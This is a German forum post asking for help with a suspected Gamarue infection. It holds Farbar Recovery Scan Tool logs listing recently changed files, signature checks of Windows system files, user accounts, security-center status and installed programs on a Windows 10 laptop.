2017-06-08 09:00 - 2017-04-25 23:11 - 07944687 _____ C:\WINDOWS\system32\nvcoproc.bin
2017-06-08 08:59 - 2017-07-02 20:18 - 00000180 _____ C:\WINDOWS\system32\{A6D608F0-0BDE-491A-97AE-5C4B05D86E01}.bat
2017-06-08 08:59 - 2017-07-02 20:18 - 00000000 ____D C:\ProgramData\NVIDIA
2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\ProgramData\NVIDIA Corporation
2017-06-08 08:59 - 2017-06-08 09:02 - 00000000 ____D C:\Program Files (x86)\NVIDIA Corporation
2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\NVIDIA Corporation
2017-06-08 08:59 - 2017-06-08 09:01 - 00000000 ____D C:\Program Files\Intel
2017-06-08 08:59 - 2017-06-08 09:00 - 00000000 ____D C:\Program Files\Synaptics
2017-06-08 08:59 - 2017-06-08 08:59 - 00044875 _____ C:\WINDOWS\system32\Drivers\rtkhdasetting.zip
2017-06-08 08:59 - 2017-06-08 08:59 - 00000200 _____ C:\WINDOWS\system32\{EC94D02F-D200-4428-9531-05AF7F9799CB}.bat
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_SynTP_01011.Wdf
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\WINDOWS\system32\Drivers\Msft_Kernel_Smb_driver_Intel_01011.Wdf
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____H C:\ProgramData\DP45977C.lfl
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\SysWOW64\RTCOM
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\WINDOWS\system32\DAX2
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 ____D C:\Program Files\Realtek
2017-06-08 08:59 - 2017-06-08 08:59 - 00000000 _____ C:\WINDOWS\system32\GfxValDisplayLog.bin
2017-06-08 08:59 - 2017-05-01 22:52 - 00001951 _____ C:\WINDOWS\NvContainerRecovery.bat
2017-06-08 08:59 - 2017-03-18 22:56 - 02233344 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\PrintConfig.dll
2017-06-08 08:59 - 2016-11-02 00:05 - 00099848 _____ (Khronos Group) C:\WINDOWS\system32\OpenCL.DLL
2017-06-08 08:58 - 2017-07-02 20:18 - 04916088 _____ C:\WINDOWS\system32\FNTCACHE.DAT
2017-06-08 08:58 - 2017-06-29 22:06 - 00000000 ____D C:\WINDOWS\system32\SleepStudy
2017-06-05 22:24 - 2017-06-12 21:54 - 00000000 ___DC C:\WINDOWS\Panther
2017-06-05 10:50 - 2017-06-05 10:50 - 00257864 _____ (Lenovo Group Limited) C:\WINDOWS\system32\iMDriverHelper.dll
==================== Ein Monat: Geänderte Dateien und Ordner ========
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird die Datei/der Ordner verschoben.)
2017-07-02 20:23 - 2017-03-20 06:41 - 01016364 _____ C:\WINDOWS\system32\perfh007.dat
2017-07-02 20:23 - 2017-03-20 06:41 - 00233256 _____ C:\WINDOWS\system32\perfc007.dat
2017-07-02 20:23 - 2016-11-19 13:21 - 00132855 _____ C:\WINDOWS\system32\InstallUtil.InstallLog
2017-07-02 20:18 - 2016-02-11 22:02 - 00000000 __SHD C:\Users\ararat\IntelGraphicsProfiles
2017-07-02 20:17 - 2017-03-18 13:40 - 00524288 _____ C:\WINDOWS\system32\config\BBI
2017-07-02 19:48 - 2017-03-18 23:03 - 00000000 ___HD C:\Program Files\WindowsApps
2017-07-02 19:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\AppReadiness
2017-06-27 22:23 - 2016-02-23 22:19 - 00000000 ____D C:\Program Files (x86)\Dropbox
2017-06-27 21:00 - 2016-02-23 23:03 - 00000321 _____ C:\Users\ararat\Documents\BIMx_Export_Log.txt
2017-06-27 21:00 - 2016-02-23 23:03 - 00000000 ____D C:\Users\ararat\Graphisoft
2017-06-27 20:26 - 2016-02-23 23:03 - 00000000 ____D C:\Users\ararat\Documents\BIMx
2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Spotify
2017-06-26 22:07 - 2016-02-20 13:26 - 00000000 ____D C:\Users\ararat\AppData\Local\Spotify
2017-06-22 09:12 - 2016-02-23 22:22 - 00000000 ___RD C:\Users\ararat\Dropbox
2017-06-22 09:11 - 2016-10-25 19:04 - 00000000 ____D C:\Users\ararat\Documents\Tickets
2017-06-21 22:52 - 2017-03-18 23:01 - 00000000 ____D C:\WINDOWS\INF
2017-06-19 22:57 - 2016-02-23 22:19 - 00000000 ____D C:\Users\ararat\AppData\Local\Dropbox
2017-06-19 21:59 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\rescache
2017-06-15 19:05 - 2016-02-12 20:16 - 00000000 __RHD C:\Users\Public\AccountPictures
2017-06-14 22:12 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\LiveKernelReports
2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\oobe
2017-06-14 22:11 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\appraiser
2017-06-14 20:33 - 2016-02-11 21:55 - 00000000 ____D C:\WINDOWS\system32\MRT
2017-06-14 20:32 - 2017-03-18 22:51 - 00000000 ____D C:\WINDOWS\CbsTemp
2017-06-14 20:32 - 2016-02-11 21:55 - 133627792 ____C (Microsoft Corporation) C:\WINDOWS\system32\MRT.exe
2017-06-14 20:22 - 2016-02-12 20:18 - 00002435 _____ C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\OneDrive.lnk
2017-06-14 20:22 - 2016-02-12 20:18 - 00000000 ___RD C:\Users\ararat\OneDrive
2017-06-13 08:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\appcompat
2017-06-13 08:53 - 2016-02-12 20:16 - 00000000 ____D C:\Users\ararat\AppData\Local\Packages
2017-06-12 21:57 - 2016-09-17 15:35 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Skype
2017-06-12 21:54 - 2017-03-18 23:03 - 00000000 ___RD C:\WINDOWS\ImmersiveControlPanel
2017-06-08 09:58 - 2017-03-18 23:03 - 00028672 _____ C:\WINDOWS\system32\config\BCD-Template
2017-06-08 09:54 - 2017-03-18 23:06 - 00000000 ____D C:\WINDOWS\Setup
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\SysWOW64\F12
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___SD C:\WINDOWS\system32\F12
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ___RD C:\Program Files\Windows Defender
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\Dism
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\ShellExperiences
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Provisioning
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows Photo Viewer
2017-06-08 09:54 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files (x86)\Windows Photo Viewer
2017-06-08 09:54 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Dism
2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\MUI
2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\MUI
2017-06-08 09:48 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\inetsrv
2017-06-08 09:48 - 2017-03-18 22:59 - 00611840 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqsnap.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00562176 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqutil.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00261120 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00204800 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisRtl.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00172544 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisRtl.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00156160 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqrt.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa30.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa20.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00054272 _____ (Microsoft Corporation) C:\WINDOWS\system32\admwprox.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00053248 _____ (Microsoft Corporation) C:\WINDOWS\system32\ahadmin.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00049664 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\admwprox.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqoa10.tlb
2017-06-08 09:48 - 2017-03-18 22:59 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\ahadmin.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00019456 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisreset.exe
2017-06-08 09:48 - 2017-03-18 22:59 - 00016896 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisreset.exe
2017-06-08 09:48 - 2017-03-18 22:59 - 00015360 _____ (Microsoft Corporation) C:\WINDOWS\system32\wamregps.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00014848 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\mqcertui.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00014336 _____ (Microsoft Corporation) C:\WINDOWS\system32\cngkeyhelper.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00013312 _____ (Microsoft Corporation) C:\WINDOWS\system32\iisrstap.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\wamregps.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00011264 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\cngkeyhelper.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00010240 _____ (Microsoft Corporation) C:\WINDOWS\SysWOW64\iisrstap.dll
2017-06-08 09:48 - 2017-03-18 22:59 - 00009096 _____ C:\WINDOWS\SysWOW64\msmqtrc.mof
2017-06-08 09:48 - 2017-03-18 22:56 - 01380352 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqqm.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00774144 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsnap.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00564224 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqutil.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00305664 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00222720 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqrt.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00177664 _____ (Microsoft Corporation) C:\WINDOWS\system32\Drivers\mqac.sys
2017-06-08 09:48 - 2017-03-18 22:56 - 00125440 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqlogmgr.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00096256 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00090624 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa30.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00055296 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa20.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00051712 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqbkup.exe
2017-06-08 09:48 - 2017-03-18 22:56 - 00036864 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqoa10.tlb
2017-06-08 09:48 - 2017-03-18 22:56 - 00026112 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqsvc.exe
2017-06-08 09:48 - 2017-03-18 22:56 - 00018432 _____ (Microsoft Corporation) C:\WINDOWS\system32\mqcertui.dll
2017-06-08 09:48 - 2017-03-18 22:56 - 00009096 _____ C:\WINDOWS\system32\msmqtrc.mof
2017-06-08 09:17 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\USOPrivate
2017-06-08 09:13 - 2016-09-24 14:37 - 00000000 ____D C:\Program Files (x86)\SunplusIT Integrated Camera
2017-06-08 09:11 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Windows NT
2017-06-08 09:10 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioDatabase
2017-06-08 09:10 - 2017-03-18 13:40 - 00032768 _____ C:\WINDOWS\system32\config\ELAM
2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Registration
2017-06-08 09:09 - 2017-03-18 23:03 - 00000000 ____D C:\ProgramData\regid.1991-06.com.microsoft
2017-06-08 09:09 - 2016-07-16 13:47 - 00000000 ____D C:\WINDOWS\system32\Tasks_Migrated
2017-06-08 09:08 - 2017-03-20 06:43 - 00000000 ____D C:\WINDOWS\HoloShell
2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RSD C:\WINDOWS\Media
2017-06-08 09:08 - 2017-03-18 23:03 - 00000000 __RHD C:\Users\Public\Libraries
2017-06-08 09:08 - 2016-02-12 19:33 - 00023056 _____ C:\WINDOWS\system32\emptyregdb.dat
2017-06-08 09:06 - 2017-05-18 08:30 - 00000000 ____D C:\WINDOWS\system32\UNP
2017-06-08 09:06 - 2017-05-01 17:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Rhinoceros 5
2017-06-08 09:06 - 2016-07-14 22:45 - 00000000 ___SD C:\ProgramData\Microsoft\Windows\Start Menu\Programs\OpenOffice 4.1.2
2017-06-08 09:06 - 2016-07-09 22:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Microsoft Silverlight
2017-06-08 09:06 - 2016-04-21 18:36 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk 3ds Max 2015
2017-06-08 09:06 - 2016-04-21 18:33 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk
2017-06-08 09:06 - 2016-03-27 18:17 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Adobe Master Collection CS6
2017-06-08 09:06 - 2016-03-23 19:09 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\ScummVM
2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WibuKey
2017-06-08 09:06 - 2016-02-23 22:54 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\CodeMeter
2017-06-08 09:06 - 2016-02-23 22:46 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\GRAPHISOFT
2017-06-08 09:06 - 2016-02-23 22:45 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Java
2017-06-08 09:06 - 2016-02-21 19:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\TeamSpeak 3 Client
2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-06-08 09:06 - 2016-02-21 13:51 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WinRAR
2017-06-08 09:06 - 2016-02-13 16:12 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\SRWare Iron (64-Bit)
2017-06-08 09:06 - 2016-02-12 20:22 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Dolby
2017-06-08 09:06 - 2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\SysWOW64\NV
2017-06-08 09:06 - 2016-02-11 22:02 - 00000000 ____D C:\WINDOWS\system32\NV
2017-06-08 09:05 - 2015-10-30 08:28 - 00000000 ____D C:\Users\Default.migrated
2017-06-08 09:02 - 2017-05-28 09:52 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Skype
2017-06-08 09:02 - 2017-03-20 06:42 - 00000000 ____D C:\WINDOWS\OCR
2017-06-08 09:02 - 2017-03-20 06:41 - 00000000 ____D C:\WINDOWS\SysWOW64\sysprep
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files (x86)\Windows Sidebar
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\IME
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\spool
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\NDF
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\IME
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\schemas
2017-06-08 09:02 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\PolicyDefinitions
2017-06-08 09:02 - 2017-03-13 19:32 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Itoo Software
2017-06-08 09:02 - 2016-11-15 23:08 - 00000000 ___HD C:\WINDOWS\system32\WLANProfiles
2017-06-08 09:02 - 2016-10-22 10:06 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lexicon
2017-06-08 09:02 - 2016-10-22 09:40 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\IK Multimedia
2017-06-08 09:02 - 2016-07-15 17:42 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Lenovo
2017-06-08 09:02 - 2016-05-07 11:39 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Intel
2017-06-08 09:02 - 2016-04-21 21:04 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Chaos Group
2017-06-08 09:02 - 2016-04-21 18:38 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Autodesk Backburner 2015
2017-06-08 09:02 - 2016-02-12 20:24 - 00000000 ____D C:\WINDOWS\SysWOW64\sda
2017-06-08 09:02 - 2016-02-11 22:02 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\NVIDIA Corporation
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 __SHD C:\Program Files\Windows Sidebar
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\SysWOW64\inetsrv
2017-06-08 09:01 - 2017-03-18 23:03 - 00000000 ____D C:\Program Files\Common Files\microsoft shared
2017-06-08 09:01 - 2017-03-13 19:32 - 00000000 ____D C:\Users\ararat\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Itoo Software
2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\system32\WinBioPlugIns
2017-06-08 09:00 - 2017-03-18 23:03 - 00000000 ____D C:\WINDOWS\Help
2017-06-08 09:00 - 2017-03-18 13:40 - 00000000 ____D C:\WINDOWS\system32\Sysprep
2017-06-08 08:59 - 2016-02-11 20:23 - 00000000 ____D C:\Intel
2017-06-08 08:41 - 2017-03-20 07:06 - 00000000 ___HD C:\$WINDOWS.~BT
2017-06-04 11:47 - 2016-10-16 17:44 - 00000000 ____D C:\Users\ararat\Documents\Wohnung
2017-06-03 08:32 - 2017-03-18 23:06 - 00835576 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerApp.exe
2017-06-03 08:32 - 2017-03-18 23:06 - 00177656 _____ (Adobe Systems Incorporated) C:\WINDOWS\SysWOW64\FlashPlayerCPLApp.cpl
==================== Dateien im Wurzelverzeichnis einiger Verzeichnisse =======
2016-08-02 21:46 - 2017-04-03 21:08 - 0000132 _____ () C:\Users\ararat\AppData\Roaming\Adobe PNG Format CS6 Prefs
2016-11-04 00:45 - 2017-03-10 23:52 - 0001456 _____ () C:\Users\ararat\AppData\Local\Adobe Save for Web 13.0 Prefs
2017-07-02 20:17 - 2017-07-02 20:17 - 0000000 ____H () C:\ProgramData\cm-lock
2017-06-08 08:59 - 2017-06-08 08:59 - 0000000 ____H () C:\ProgramData\DP45977C.lfl
Einige Dateien in TEMP:
====================
2017-06-27 22:40 - 2017-03-18 22:58 - 0830464 _____ (Microsoft Corporation) C:\Users\ararat\AppData\Local\Temp\cdo3360657184.dll
2017-06-26 21:53 - 2017-03-18 22:58 - 0830464 _____ (Microsoft Corporation) C:\Users\ararat\AppData\Local\Temp\cdo738377283.dll
==================== Bamital & volsnap ======================
(Es ist kein automatischer Fix für Dateien vorhanden, die an der Verifikation gescheitert sind.)
C:\WINDOWS\system32\winlogon.exe => Datei ist digital signiert
C:\WINDOWS\system32\wininit.exe => Datei ist digital signiert
C:\WINDOWS\explorer.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\explorer.exe => Datei ist digital signiert
C:\WINDOWS\system32\svchost.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\svchost.exe => Datei ist digital signiert
C:\WINDOWS\system32\services.exe => Datei ist digital signiert
C:\WINDOWS\system32\User32.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\User32.dll => Datei ist digital signiert
C:\WINDOWS\system32\userinit.exe => Datei ist digital signiert
C:\WINDOWS\SysWOW64\userinit.exe => Datei ist digital signiert
C:\WINDOWS\system32\rpcss.dll => Datei ist digital signiert
C:\WINDOWS\system32\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\SysWOW64\dnsapi.dll => Datei ist digital signiert
C:\WINDOWS\system32\Drivers\volsnap.sys => Datei ist digital signiert
LastRegBack: 2017-06-18 19:26
==================== Ende von FRST.txt ============================
|
|
02.07.2017, 20:04
| #3 |
| | Windows 10 - GamarueCode:
ATTFilter Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 02-07-2017
durchgeführt von ararat (02-07-2017 20:58:55)
Gestartet von C:\Users\ararat\Desktop
Windows 10 Pro Version 1703 (X64) (2017-06-08 07:11:14)
Start-Modus: Normal
==========================================================
==================== Konten: =============================
Administrator (S-1-5-21-3349751938-1204465652-1694021483-500 - Administrator - Disabled)
ararat (S-1-5-21-3349751938-1204465652-1694021483-1000 - Administrator - Enabled) => C:\Users\ararat
DefaultAccount (S-1-5-21-3349751938-1204465652-1694021483-503 - Limited - Disabled)
Gast (S-1-5-21-3349751938-1204465652-1694021483-501 - Limited - Disabled)
HomeGroupUser$ (S-1-5-21-3349751938-1204465652-1694021483-1002 - Limited - Enabled)
==================== Sicherheits-Center ========================
(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
==================== Installierte Programme ======================
(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)
3DStudio Import 18 GER (HKLM\...\063FFF2FFF18FF00FF0201F01F02F000-R1) (Version: 18.0 - Graphisoft)
Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 17.009.20044 - Adobe Systems Incorporated)
Adobe AIR (HKLM-x32\...\Adobe AIR) (Version: 3.1.0.4880 - Adobe Systems Incorporated)
Adobe Creative Suite 6 Master Collection (HKLM-x32\...\{E8AD3069-9EB7-4BA8-8BFE-83F4E69355C0}) (Version: 6 - Adobe Systems Incorporated)
Adobe Flash Player 21 PPAPI (HKLM-x32\...\Adobe Flash Player PPAPI) (Version: 21.0.0.213 - Adobe Systems Incorporated)
Adobe Help Manager (HKLM-x32\...\chc.4875E02D9FB21EE389F73B8D1702B320485DF8CE.1) (Version: 4.0.244 - Adobe Systems Incorporated)
AmpegSVX (HKLM-x32\...\{CF1D7323-8A0A-49C7-83B0-088DB90721E2}) (Version: 1.1.0 - IK Multimedia)
AmpliTube 3 (HKLM-x32\...\{5DD152A8-BFB3-439E-90CD-5C00C2116E23}) (Version: 3.0.1 - IK Multimedia)
ArchiCAD 18 GER (HKLM\...\001FFF2FFF18FF00FF0201F01F02F000-R1) (Version: 18.0 - GRAPHISOFT)
Autodesk 3ds Max 2015 (HKLM\...\{52B37EC7-D836-0410-0264-3C24BCED2010}) (Version: 17.0.630.0 - Autodesk) Hidden
Autodesk 3ds Max 2015 (HKLM\...\Autodesk 3ds Max 2015) (Version: 17.0.630.0 - Autodesk)
Autodesk 3ds Max 2015 Populate Data (HKLM\...\{57E92DED-DC6C-41E5-B9E1-76D83BD2EABE}) (Version: 17.0.0.0 - Autodesk)
Autodesk Application Manager (HKLM-x32\...\Autodesk Application Manager) (Version: 1.0.59.0 - Autodesk)
Autodesk Backburner 2015 (HKLM-x32\...\{8C5F38D2-8EFE-49A4-B3F5-BF3210FED168}) (Version: 15.0.0.0 - Autodesk)
Autodesk DirectConnect 2015 64-bit (HKLM\...\{23C9ED7C-CB64-45FE-A7EA-1BA666F5589D}) (Version: 9.0.56.4 - Autodesk) Hidden
Autodesk DirectConnect 2015 64-bit (HKLM\...\Autodesk DirectConnect 2015 64-bit) (Version: 9.0.56.4 - Autodesk)
Autodesk Inventor Server Engine for 3ds Max 2015 (HKLM\...\{9167CA34-4E48-49E3-8892-3C439739D2D3}) (Version: 17.0 - Autodesk)
Autodesk Material Library 2015 (HKLM-x32\...\{427F733F-4D6C-45BC-9324-EB743104C321}) (Version: 5.2.9.100 - Autodesk)
Autodesk Material Library Base Resolution Image Library 2015 (HKLM-x32\...\{ABE2F70B-8D94-44E9-AA04-F0DB35063D62}) (Version: 5.2.9.100 - Autodesk)
Autodesk Material Library Medium Resolution Image Library 2015 (HKLM-x32\...\{9F6466D9-6EFC-4A10-B931-C72D1A3F1763}) (Version: 5.2.9.100 - Autodesk)
Autodesk Revit Interoperability for 3ds Max 2015 (HKLM\...\{0BB716E0-1500-0610-0000-097DC2F354DF}) (Version: 15.0.107.0 - Autodesk) Hidden
Autodesk Revit Interoperability for 3ds Max 2015 (HKLM\...\Autodesk Revit Interoperability for 3ds Max 2015) (Version: 15.0.107.0 - Autodesk)
CodeMeter Runtime Kit v5.10a (HKLM\...\{CADFF08A-A157-474F-B6A8-8F26F81F7ABE}) (Version: 5.10.1224.501 - WIBU-SYSTEMS AG)
Dolby Digital Plus Advanced Audio (HKLM\...\{B0BFC63F-EA07-419E-960B-3FB2ED5DD0B2}) (Version: 7.6.3.1 - Dolby Laboratories Inc)
Dropbox (HKLM-x32\...\Dropbox) (Version: 29.4.20 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.59.1 - Dropbox, Inc.) Hidden
Forest Pack Pro 4.3.6 (HKLM-x32\...\Forest Pack Pro) (Version: 4.3.6 - Itoo Software)
Intel Collaborative Processor Performance Control (HKLM-x32\...\0E7DAF70-FB54-4B91-B192-7E771C25AEEB) (Version: 1.0.0.1018 - Intel Corporation)
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 11.0.3.1184 - Intel Corporation)
Intel(R) Network Connections Drivers (HKLM\...\PROSet) (Version: 20.2 - Intel)
Intel(R) Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 20.19.15.4531 - Intel Corporation)
Intel(R) Wireless Bluetooth(R)(patch version 17.1.1532.1813) (HKLM\...\{302600C1-6BDF-4FD1-1507-148929CC1385}) (Version: 17.1.1507.0532 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{f5d71765-7cd1-4e68-998f-5b379e725da3}) (Version: 10.0.22 - Intel(R) Corporation) Hidden
Intel® PROSet/Wireless Software (HKLM-x32\...\{185db067-38cd-4521-a43e-c39b96ee1389}) (Version: 19.50.1 - Intel Corporation)
Java 7 Update 51 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83217051FF}) (Version: 7.0.510 - Oracle)
Lenovo Anzeige am Bildschirm (HKLM\...\OnScreenDisplay) (Version: 8.80.10 - Lenovo) Hidden
Lenovo Power Management Driver (HKLM\...\Power Management Driver) (Version: 1.67.12.16 - Lenovo) Hidden
Lenovo QuickOptimizer (HKLM\...\{8D2C871B-1B9F-45AC-9C43-2BB18089CDFA}) (Version: 1.0.022.00 - Lenovo)
Lenovo Settings - Power (HKLM-x32\...\{A6CFC34A-56EE-4AF5-8C49-995F59E6A160}) (Version: 2.00.000 - Lenovo) Hidden
Lenovo Solution Center (HKLM\...\{C1FC707B-AE6B-4DC4-89A5-6628A01F8103}) (Version: 3.3.003.00 - Lenovo)
